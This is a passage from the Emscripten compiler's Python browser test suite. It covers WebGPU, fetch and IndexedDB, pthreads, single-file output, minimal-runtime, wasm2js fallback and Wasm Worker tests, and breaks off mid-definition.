def test_webgpu_basic_rendering(self):
for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args)
def test_webgpu_get_device(self):
for args in [['-sASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912'])
def test_fetch_headers_received(self):
self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -sPROXY_TO_PTHREAD option.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_locale(self):
self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal'))
self.emcc_args.append('-I' + path_from_root('system/lib/pthread'))
for args in [
[],
['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-sPROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-sASSERTIONS'])
run(['-sPROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE']
if not wasm_enabled:
args += ['-sWASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-sMODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-sMODULARIZE'], 'Module();'),
(['subdir'], ['-sMODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
for mode in [1, 2]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-sMINIMAL_RUNTIME=2']
for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]:
for modularize in [[], ['-sMODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -sMINIMAL_RUNTIME works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
create_file('test.html', html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_system(self):
self.btest_exit(test_file('system.c'))
# Tests the hello_wasm_worker.c documentation example code.
@also_with_minimal_runtime
def test_wasm_worker_hello(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
def test_wasm_worker_hello_minimal_runtime_2(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2'])
# Tests Wasm Workers build in Wasm2JS mode.
@also_with_minimal_runtime
def test_wasm_worker_hello_wasm2js(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0'])
# Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script file to the main JS file.
@also_with_minimal_runtime
def test_wasm_worker_embedded(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2'])
# Tests Wasm Worker thread stack setup
@also_with_minimal_runtime
def test_wasm_worker_thread_stack(self):
for mode in [0, 1, 2]:
self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}'])
# Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions
@also_with_minimal_runtime
def test_wasm_worker_malloc(self):
self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests Wasm Worker+pthreads simultaneously
@also_with_minimal_runtime
def test_wasm_worker_and_pthreads(self):
self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread'])
# Tests emscripten_wasm_worker_self_id() function
@also_with_minimal_runtime
def test_wasm_worker_self_id(self):
self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_tls_wasm_assembly(self):
self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'),
expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')])
# Tests C++11 keyword thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_cpp11_thread_local(self):
self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS'])
# Tests C11 keyword _Thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_c11__Thread_local(self):
self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot test C11 - because of EM_ASM must test Gnu11.
# Tests GCC specific extension keyword __thread for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_gcc___thread(self):
self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11'])
# Tests emscripten_wasm_worker_sleep()
@also_with_minimal_runtime
def test_wasm_worker_sleep(self):
self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_wasm_worker()
@also_with_minimal_runtime
def test_wasm_worker_terminate(self):
self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_all_wasm_workers()
@also_with_minimal_runtime
def test_wasm_worker_terminate_all(self):
self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API
@also_with_minimal_runtime
def test_wasm_worker_post_function(self):
self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT
# to send a message back from Worker to its parent thread.
@also_with_minimal_runtime
def test_wasm_worker_post_function_to_main_thread(self):
self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS'])
# Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free()
@also_with_minimal_runtime
def test_wasm_worker_hardware_concurrency_is_lock_free(self):
self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait32_notify(self):
self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait64_notify(self):
self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_wait_async(self):
self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_wait_async(self):
self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs_at_address(self):
